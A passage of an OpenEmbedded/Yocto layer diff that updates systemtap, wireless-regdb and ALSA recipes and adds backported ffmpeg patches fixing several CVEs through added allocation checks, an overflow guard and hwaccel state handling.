5DEPENDS = "systemtap virtual/kernel" 5DEPENDS = "systemtap virtual/kernel"
diff --git a/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
new file mode 100644
index 0000000000..f885c44460
--- /dev/null
+++ b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
@@ -0,0 +1,49 @@
1From f199d1982ef8a6c6d5c06c082d057b8793bcc6aa Mon Sep 17 00:00:00 2001
2From: Serhei Makarov <serhei@serhei.io>
3Date: Fri, 21 Jan 2022 18:21:46 -0500
4Subject: [PATCH] gcc12 c++ compatibility re-tweak for rhel6: use function
5 pointer instead of lambdas instead of ptr_fun<>
6
7Saving 2 lines in ltrim/rtrim is probably not a good reason to drop
8compatibility with the RHEL6 system compiler. Actually declaring a
9named function and passing the function pointer is compatible with
10everything.
11
12Upstream-Status: Backport [https://sourceware.org/git/?p=systemtap.git;a=commit;h=f199d1982ef8a6c6d5c06c082d057b8793bcc6aa]
13Signed-off-by: Khem Raj <raj.khem@gmail.com>
14---
15 util.cxx | 13 ++++++++-----
16 1 file changed, 8 insertions(+), 5 deletions(-)
17
18--- a/util.cxx
19+++ b/util.cxx
20@@ -1757,21 +1757,24 @@ flush_to_stream (const string &fname, os
21 return 1; // Failure
22 }
23
24+int
25+not_isspace(unsigned char c)
26+{
27+ return !std::isspace(c);
28+}
29+
30 // trim from start (in place)
31 void
32 ltrim(std::string &s)
33 {
34- s.erase(s.begin(),
35- std::find_if(s.begin(), s.end(),
36- std::not1(std::ptr_fun<int, int>(std::isspace))));
37+ s.erase(s.begin(), std::find_if(s.begin(), s.end(), not_isspace));
38 }
39
40 // trim from end (in place)
41 void
42 rtrim(std::string &s)
43 {
44- s.erase(std::find_if(s.rbegin(), s.rend(),
45- std::not1(std::ptr_fun<int, int>(std::isspace))).base(), s.end());
46+ s.erase(std::find_if(s.rbegin(), s.rend(), not_isspace).base(), s.end());
47 }
48
49 // trim from both ends (in place)
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.bb b/meta/recipes-kernel/systemtap/systemtap_git.bb
index 1c9f2aed16..a8b2cf1eac 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap_git.bb
@@ -1,9 +1,14 @@
1SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux" 1SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux"
2DESCRIPTION = "It provides free software infrastructure to simplify the \
3gathering of information about the running Linux system. This assists \
4diagnosis of a performance or functional problem."
2HOMEPAGE = "https://sourceware.org/systemtap/" 5HOMEPAGE = "https://sourceware.org/systemtap/"
3 6
4require systemtap_git.inc 7require systemtap_git.inc
5 8
6SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch" 9SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch \
10 file://0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch \
11 "
7 12
8DEPENDS = "elfutils" 13DEPENDS = "elfutils"
9 14
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.inc b/meta/recipes-kernel/systemtap/systemtap_git.inc
index 116e83fe0f..af55f15fd4 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.inc
+++ b/meta/recipes-kernel/systemtap/systemtap_git.inc
@@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
3SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda" 3SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda"
4PV = "4.2" 4PV = "4.2"
5 5
6SRC_URI = "git://sourceware.org/git/systemtap.git \ 6SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \
7 file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \ 7 file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \
8 file://0001-Install-python-modules-to-correct-library-dir.patch \ 8 file://0001-Install-python-modules-to-correct-library-dir.patch \
9 file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \ 9 file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \
diff --git a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.11.20.bb b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
index b3567bca95..6489bc90d9 100644
--- a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.11.20.bb
+++ b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
@@ -5,7 +5,7 @@ LICENSE = "ISC"
5LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c" 5LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c"
6 6
7SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz" 7SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz"
8SRC_URI[sha256sum] = "b4164490d82ff7b0086e812ac42ab27baf57be24324d4c0ee1c5dd6ba27f2a52" 8SRC_URI[sha256sum] = "c8a61c9acf76fa7eb4239e89f640dee3e87098d9f69b4d3518c9c60fc6d20c55"
9 9
10inherit bin_package allarch 10inherit bin_package allarch
11 11
@@ -13,7 +13,7 @@ do_install() {
13 install -d -m0755 ${D}${nonarch_libdir}/crda 13 install -d -m0755 ${D}${nonarch_libdir}/crda
14 install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys 14 install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys
15 install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin 15 install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin
16 install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem 16 install -m 0644 wens.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/wens.key.pub.pem
17 17
18 install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db 18 install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db
19 install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s 19 install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s
diff --git a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
index e2bc61fbe9..4867c798b9 100644
--- a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
@@ -1,4 +1,6 @@
1SUMMARY = "ALSA sound library" 1SUMMARY = "ALSA sound library"
2DESCRIPTION = "(Occasionally a.k.a. libasound) is a userspace library that \
3provides a level of abstraction over the /dev interfaces provided by the kernel modules."
2HOMEPAGE = "http://www.alsa-project.org" 4HOMEPAGE = "http://www.alsa-project.org"
3BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking" 5BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
4SECTION = "libs/multimedia" 6SECTION = "libs/multimedia"
diff --git a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
index 61d394b0f0..8205982fcc 100644
--- a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
@@ -1,4 +1,7 @@
1SUMMARY = "ALSA Plugins" 1SUMMARY = "ALSA Plugins"
2DESCRIPTION = "Used to create virtual devices that can be used like normal \
3hardware devices but cause extra processing of the sound stream to take place. \
4They are used while configuring ALSA in the .asoundrc file."
2HOMEPAGE = "http://alsa-project.org" 5HOMEPAGE = "http://alsa-project.org"
3BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking" 6BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
4SECTION = "multimedia" 7SECTION = "multimedia"
@@ -33,7 +36,7 @@ PACKAGECONFIG ??= "\
33 speexdsp \ 36 speexdsp \
34 ${@bb.utils.filter('DISTRO_FEATURES', 'pulseaudio', d)} \ 37 ${@bb.utils.filter('DISTRO_FEATURES', 'pulseaudio', d)} \
35" 38"
36PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,avtp" 39PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,libavtp"
37PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack" 40PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
38PACKAGECONFIG[libav] = "--enable-libav,--disable-libav,libav" 41PACKAGECONFIG[libav] = "--enable-libav,--disable-libav,libav"
39PACKAGECONFIG[maemo-plugin] = "--enable-maemo-plugin,--disable-maemo-plugin" 42PACKAGECONFIG[maemo-plugin] = "--enable-maemo-plugin,--disable-maemo-plugin"
diff --git a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
index c1f4acdb03..c979d7642e 100644
--- a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
+++ b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Advanced tools for certain ALSA sound card drivers" 1SUMMARY = "Advanced tools for certain ALSA sound card drivers"
2DESCRIPTION = "Package containing a number of tools ranging from envy24control \
3which provides complete control over all devices with an envy24 chip, to \
4firmware loaders for pcmcia, USB and the hdsp devices."
2HOMEPAGE = "http://www.alsa-project.org" 5HOMEPAGE = "http://www.alsa-project.org"
3BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking" 6BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
4SECTION = "console/utils" 7SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
index 5101cc7b7a..2ff5494c99 100644
--- a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
@@ -1,4 +1,7 @@
1SUMMARY = "ALSA topology configuration files" 1SUMMARY = "ALSA topology configuration files"
2DESCRIPTION = "Provides a method for audio drivers to load their mixers, \
3routing, PCMs and capabilities from user space at runtime without changing \
4any driver source code."
2HOMEPAGE = "https://alsa-project.org" 5HOMEPAGE = "https://alsa-project.org"
3BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking" 6BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
4LICENSE = "BSD-3-Clause" 7LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
index a432d5de07..ee1688b421 100644
--- a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
@@ -1,4 +1,7 @@
1SUMMARY = "ALSA Use Case Manager configuration" 1SUMMARY = "ALSA Use Case Manager configuration"
2DESCRIPTION = "This package contains ALSA Use Case Manager configuration \
3of audio input/output names and routing for specific audio hardware. \
4They can be used with the alsaucm tool. "
2HOMEPAGE = "https://alsa-project.org" 5HOMEPAGE = "https://alsa-project.org"
3BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking" 6BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
4LICENSE = "BSD-3-Clause" 7LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
index 1dc30f377b..54aa2f9544 100644
--- a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
@@ -1,4 +1,6 @@
1SUMMARY = "ALSA sound utilities" 1SUMMARY = "ALSA sound utilities"
2DESCRIPTION = "collection of small and often extremely powerful applications \
3designed to allow users to control the various parts of the ALSA system."
2HOMEPAGE = "http://www.alsa-project.org" 4HOMEPAGE = "http://www.alsa-project.org"
3BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking" 5BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
4SECTION = "console/utils" 6SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
new file mode 100644
index 0000000000..abfc024820
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
@@ -0,0 +1,61 @@
1From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001
2From: Paul B Mahol <onemda@gmail.com>
3Date: Mon, 27 Jan 2020 21:53:08 +0100
4Subject: [PATCH] avformat/tty: add probe function
5
6CVE: CVE-2021-3566
7Signed-off-by: Saloni Jain <salonij@kpit.com>
8
9Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532]
10Comment: No changes/refreshing done.
11---
12 libavformat/tty.c | 21 ++++++++++++++++++++-
13 1 file changed, 20 insertions(+), 1 deletion(-)
14
15diff --git a/libavformat/tty.c b/libavformat/tty.c
16index 8d48f2c45c12..60f7e9f87ee7 100644
17--- a/libavformat/tty.c
18+++ b/libavformat/tty.c
19@@ -34,6 +34,13 @@
20 #include "internal.h"
21 #include "sauce.h"
22
23+static int isansicode(int x)
24+{
25+ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f);
26+}
27+
28+static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt";
29+
30 typedef struct TtyDemuxContext {
31 AVClass *class;
32 int chars_per_frame;
33@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext {
34 AVRational framerate; /**< Set by a private option. */
35 } TtyDemuxContext;
36
37+static int read_probe(const AVProbeData *p)
38+{
39+ int cnt = 0;
40+
41+ for (int i = 0; i < p->buf_size; i++)
42+ cnt += !!isansicode(p->buf[i]);
43+
44+ return (cnt * 100LL / p->buf_size) * (cnt > 400) *
45+ !!av_match_ext(p->filename, tty_extensions);
46+}
47+
48 /**
49 * Parse EFI header
50 */
51@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = {
52 .name = "tty",
53 .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"),
54 .priv_data_size = sizeof(TtyDemuxContext),
55+ .read_probe = read_probe,
56 .read_header = read_header,
57 .read_packet = read_packet,
58- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt",
59+ .extensions = tty_extensions,
60 .priv_class = &tty_demuxer_class,
61 };
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
new file mode 100644
index 0000000000..e5be985fc3
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
@@ -0,0 +1,53 @@
1From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001
2From: James Almer <jamrial@gmail.com>
3Date: Wed, 21 Jul 2021 01:02:44 -0300
4Subject: [PATCH] avcodec/utils: don't return negative values in
5 av_get_audio_frame_duration()
6
7In some extrme cases, like with adpcm_ms samples with an extremely high channel
8count, get_audio_frame_duration() may return a negative frame duration value.
9Don't propagate it, and instead return 0, signaling that a duration could not
10be determined.
11
12CVE: CVE-2021-3566
13Fixes ticket #9312
14Signed-off-by: James Almer <jamrial@gmail.com>
15Signed-off-by: Saloni Jain <salonij@kpit.com>
16
17Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1]
18Comment: No changes/refreshing done.
19---
20 libavcodec/utils.c | 6 ++++--
21 1 file changed, 4 insertions(+), 2 deletions(-)
22
23diff --git a/libavcodec/utils.c b/libavcodec/utils.c
24index 5fad782f5a..cfc07cbcb8 100644
25--- a/libavcodec/utils.c
26+++ b/libavcodec/utils.c
27@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba,
28
29 int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes)
30 {
31- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
32+ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
33 avctx->channels, avctx->block_align,
34 avctx->codec_tag, avctx->bits_per_coded_sample,
35 avctx->bit_rate, avctx->extradata, avctx->frame_size,
36 frame_bytes);
37+ return FFMAX(0, duration);
38 }
39
40 int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes)
41 {
42- return get_audio_frame_duration(par->codec_id, par->sample_rate,
43+ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate,
44 par->channels, par->block_align,
45 par->codec_tag, par->bits_per_coded_sample,
46 par->bit_rate, par->extradata, par->frame_size,
47 frame_bytes);
48+ return FFMAX(0, duration);
49 }
50
51 #if !HAVE_THREADS
52--
532.20.1
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
new file mode 100644
index 0000000000..bd8a08a216
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
@@ -0,0 +1,36 @@
1From: Michael Niedermayer <michael@niedermayer.cc>
2Date: Sun, 27 Feb 2022 14:43:04 +0100
3Subject: [PATCH] avcodec/g729_parser: Check channels
4
5Fixes: signed integer overflow: 10 * 808464428 cannot be represented in type 'int'
6Fixes: assertion failure
7Fixes: ticket9651
8
9Reviewed-by: Paul B Mahol <onemda@gmail.com>
10Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
11(cherry picked from commit 757da974b21833529cc41bdcc9684c29660cdfa8)
12Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
13
14CVE: CVE-2022-1475
15Upstream-Status: Backport [https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=e9e2ddbc6c78cc18b76093617f82c920e58a8d1f]
16Comment: Patch is refreshed as per ffmpeg codebase
17Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
18
19---
20 libavcodec/g729_parser.c | 3 +++
21 1 file changed, 3 insertions(+)
22
23Index: ffmpeg-4.2.2/libavcodec/g729_parser.c
24===================================================================
25--- a/libavcodec/g729_parser.c
26+++ b/libavcodec/g729_parser.c
27@@ -48,6 +48,9 @@ static int g729_parse(AVCodecParserConte
28 av_assert1(avctx->codec_id == AV_CODEC_ID_G729);
29 /* FIXME: replace this heuristic block_size with more precise estimate */
30 s->block_size = (avctx->bit_rate < 8000) ? G729D_6K4_BLOCK_SIZE : G729_8K_BLOCK_SIZE;
31+ // channels > 2 is invalid, we pass the packet on unchanged
32+ if (avctx->channels > 2)
33+ s->block_size = 0;
34 s->block_size *= avctx->channels;
35 s->duration = avctx->frame_size;
36 }
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
new file mode 100644
index 0000000000..febf49cff2
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
@@ -0,0 +1,41 @@
1From 656cb0450aeb73b25d7d26980af342b37ac4c568 Mon Sep 17 00:00:00 2001
2From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
3Date: Tue, 15 Feb 2022 17:58:08 +0800
4Subject: [PATCH] avcodec/vp3: Add missing check for av_malloc
5
6Since the av_malloc() may fail and return NULL pointer,
7it is needed that the 's->edge_emu_buffer' should be checked
8whether the new allocation is success.
9
10Fixes: d14723861b ("VP3: fix decoding of videos with stride > 2048")
11
12CVE: CVE-2022-3109
13Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/656cb0450aeb73b25d7d26980af342b37ac4c568]
14Comments: Refreshed hunk
15
16Reviewed-by: Peter Ross <pross@xvid.org>
17Signed-off-by: Jiasheng Jiang <jiasheng@iscas.ac.cn>
18Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
19---
20 libavcodec/vp3.c | 7 ++++++-
21 1 file changed, 6 insertions(+), 1 deletion(-)
22
23diff --git a/libavcodec/vp3.c b/libavcodec/vp3.c
24index e9ab54d73677..e2418eb6fa04 100644
25--- a/libavcodec/vp3.c
26+++ b/libavcodec/vp3.c
27@@ -2740,8 +2740,13 @@
28 if (ff_thread_get_buffer(avctx, &s->current_frame, AV_GET_BUFFER_FLAG_REF) < 0)
29 goto error;
30
31- if (!s->edge_emu_buffer)
32+ if (!s->edge_emu_buffer) {
33 s->edge_emu_buffer = av_malloc(9 * FFABS(s->current_frame.f->linesize[0]));
34+ if (!s->edge_emu_buffer) {
35+ ret = AVERROR(ENOMEM);
36+ goto error;
37+ }
38+ }
39
40 if (s->keyframe) {
41 if (!s->theora) {
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
new file mode 100644
index 0000000000..fcbd9b3e1b
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
@@ -0,0 +1,67 @@
1From 9cf652cef49d74afe3d454f27d49eb1a1394951e Mon Sep 17 00:00:00 2001
2From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
3Date: Wed, 23 Feb 2022 10:31:59 +0800
4Subject: [PATCH] avformat/nutdec: Add check for avformat_new_stream
5
6Check for failure of avformat_new_stream() and propagate
7the error code.
8
9Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
10
11CVE: CVE-2022-3341
12
13Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/9cf652cef49d74afe3d454f27d49eb1a1394951e]
14
15Comments: Refreshed Hunk
16Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
17Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
18---
19 libavformat/nutdec.c | 16 ++++++++++++----
20 1 file changed, 12 insertions(+), 4 deletions(-)
21
22diff --git a/libavformat/nutdec.c b/libavformat/nutdec.c
23index 0a8a700acf..f9ad2c0af1 100644
24--- a/libavformat/nutdec.c
25+++ b/libavformat/nutdec.c
26@@ -351,8 +351,12 @@ static int decode_main_header(NUTContext *nut)
27 ret = AVERROR(ENOMEM);
28 goto fail;
29 }
30- for (i = 0; i < stream_count; i++)
31- avformat_new_stream(s, NULL);
32+ for (i = 0; i < stream_count; i++) {
33+ if (!avformat_new_stream(s, NULL)) {
34+ ret = AVERROR(ENOMEM);
35+ goto fail;
36+ }
37+ }
38
39 return 0;
40 fail:
41@@ -793,19 +793,23 @@
42 NUTContext *nut = s->priv_data;
43 AVIOContext *bc = s->pb;
44 int64_t pos;
45- int initialized_stream_count;
46+ int initialized_stream_count, ret;
47
48 nut->avf = s;
49
50 /* main header */
51 pos = 0;
52+ ret = 0;
53 do {
54+ if (ret == AVERROR(ENOMEM))
55+ return ret;
56+
57 pos = find_startcode(bc, MAIN_STARTCODE, pos) + 1;
58 if (pos < 0 + 1) {
59 av_log(s, AV_LOG_ERROR, "No main startcode found.\n");
60 goto fail;
61 }
62- } while (decode_main_header(nut) < 0);
63+ } while ((ret = decode_main_header(nut)) < 0);
64
65 /* stream headers */
66 pos = 0;
67
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
new file mode 100644
index 0000000000..707073709a
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
@@ -0,0 +1,136 @@
1From d4b7b3c03ee2baf0166ce49dff17ec9beff684db Mon Sep 17 00:00:00 2001
2From: Anton Khirnov <anton@khirnov.net>
3Date: Fri, 2 Sep 2022 22:21:27 +0200
4Subject: [PATCH] lavc/pthread_frame: avoid leaving stale hwaccel state in
5 worker threads
6
7This state is not refcounted, so make sure it always has a well-defined
8owner.
9
10Remove the block added in 091341f2ab5bd35ca1a2aae90503adc74f8d3523, as
11this commit also solves that issue in a more general way.
12
13(cherry picked from commit cc867f2c09d2b69cee8a0eccd62aff002cbbfe11)
14Signed-off-by: Anton Khirnov <anton@khirnov.net>
15(cherry picked from commit 35aa7e70e7ec350319e7634a30d8d8aa1e6ecdda)
16Signed-off-by: Anton Khirnov <anton@khirnov.net>
17(cherry picked from commit 3bc28e9d1ab33627cea3c632dd6b0c33e22e93ba)
18Signed-off-by: Anton Khirnov <anton@khirnov.net>
19
20CVE: CVE-2022-48434
21Upstream-Status: Backport [https://git.ffmpeg.org/gitweb/ffmpeg.git/commit/d4b7b3c03ee2baf0166ce49dff17ec9beff684db]
22Signed-off-by: Ranjitsinh Rathod ranjitsinh.rathod@kpit.com
23Comment: Hunk#6 refreshed to backport changes and other to remove patch-fuzz warnings
24---
25 libavcodec/pthread_frame.c | 46 +++++++++++++++++++++++++++++---------
26 1 file changed, 35 insertions(+), 11 deletions(-)
27
28diff --git a/libavcodec/pthread_frame.c b/libavcodec/pthread_frame.c
29index 36ac0ac..bbc5ba6 100644
30--- a/libavcodec/pthread_frame.c
31+++ b/libavcodec/pthread_frame.c
32@@ -135,6 +135,12 @@ typedef struct FrameThreadContext {
33 * Set for the first N packets, where N is the number of threads.
34 * While it is set, ff_thread_en/decode_frame won't return any results.
35 */
36+
37+ /* hwaccel state is temporarily stored here in order to transfer its ownership
38+ * to the next decoding thread without the need for extra synchronization */
39+ const AVHWAccel *stash_hwaccel;
40+ void *stash_hwaccel_context;
41+ void *stash_hwaccel_priv;
42 } FrameThreadContext;
43
44 #define THREAD_SAFE_CALLBACKS(avctx) \
45@@ -211,9 +217,17 @@ static attribute_align_arg void *frame_worker_thread(void *arg)
46 ff_thread_finish_setup(avctx);
47
48 if (p->hwaccel_serializing) {
49+ /* wipe hwaccel state to avoid stale pointers lying around;
50+ * the state was transferred to FrameThreadContext in
51+ * ff_thread_finish_setup(), so nothing is leaked */
52+ avctx->hwaccel = NULL;
53+ avctx->hwaccel_context = NULL;
54+ avctx->internal->hwaccel_priv_data = NULL;
55+
56 p->hwaccel_serializing = 0;
57 pthread_mutex_unlock(&p->parent->hwaccel_mutex);
58 }
59+ av_assert0(!avctx->hwaccel);
60
61 if (p->async_serializing) {
62 p->async_serializing = 0;
63@@ -275,14 +289,10 @@ static int update_context_from_thread(AVCodecContext *dst, AVCodecContext *src,
64 dst->color_range = src->color_range;
65 dst->chroma_sample_location = src->chroma_sample_location;
66
67- dst->hwaccel = src->hwaccel;
68- dst->hwaccel_context = src->hwaccel_context;
69-
70 dst->channels = src->channels;
71 dst->sample_rate = src->sample_rate;
72 dst->sample_fmt = src->sample_fmt;
73 dst->channel_layout = src->channel_layout;
74- dst->internal->hwaccel_priv_data = src->internal->hwaccel_priv_data;
75
76 if (!!dst->hw_frames_ctx != !!src->hw_frames_ctx ||
77 (dst->hw_frames_ctx && dst->hw_frames_ctx->data != src->hw_frames_ctx->data)) {
78@@ -415,6 +425,12 @@ static int submit_packet(PerThreadContext *p, AVCodecContext *user_avctx,
79 pthread_mutex_unlock(&p->mutex);
80 return err;
81 }
82+
83+ /* transfer hwaccel state stashed from previous thread, if any */
84+ av_assert0(!p->avctx->hwaccel);
85+ FFSWAP(const AVHWAccel*, p->avctx->hwaccel, fctx->stash_hwaccel);
86+ FFSWAP(void*, p->avctx->hwaccel_context, fctx->stash_hwaccel_context);
87+ FFSWAP(void*, p->avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
88 }
89
90 av_packet_unref(&p->avpkt);
91@@ -616,6 +632,14 @@ void ff_thread_finish_setup(AVCodecContext *avctx) {
92 async_lock(p->parent);
93 }
94
95+ /* save hwaccel state for passing to the next thread;
96+ * this is done here so that this worker thread can wipe its own hwaccel
97+ * state after decoding, without requiring synchronization */
98+ av_assert0(!p->parent->stash_hwaccel);
99+ p->parent->stash_hwaccel = avctx->hwaccel;
100+ p->parent->stash_hwaccel_context = avctx->hwaccel_context;
101+ p->parent->stash_hwaccel_priv = avctx->internal->hwaccel_priv_data;
102+
103 pthread_mutex_lock(&p->progress_mutex);
104 if(atomic_load(&p->state) == STATE_SETUP_FINISHED){
105 av_log(avctx, AV_LOG_WARNING, "Multiple ff_thread_finish_setup() calls\n");
106@@ -657,13 +681,6 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
107
108 park_frame_worker_threads(fctx, thread_count);
109
110- if (fctx->prev_thread && fctx->prev_thread != fctx->threads)
111- if (update_context_from_thread(fctx->threads->avctx, fctx->prev_thread->avctx, 0) < 0) {
112- av_log(avctx, AV_LOG_ERROR, "Final thread update failed\n");
113- fctx->prev_thread->avctx->internal->is_copy = fctx->threads->avctx->internal->is_copy;
114- fctx->threads->avctx->internal->is_copy = 1;
115- }
116-
117 for (i = 0; i < thread_count; i++) {
118 PerThreadContext *p = &fctx->threads[i];
119
120@@ -713,6 +730,13 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
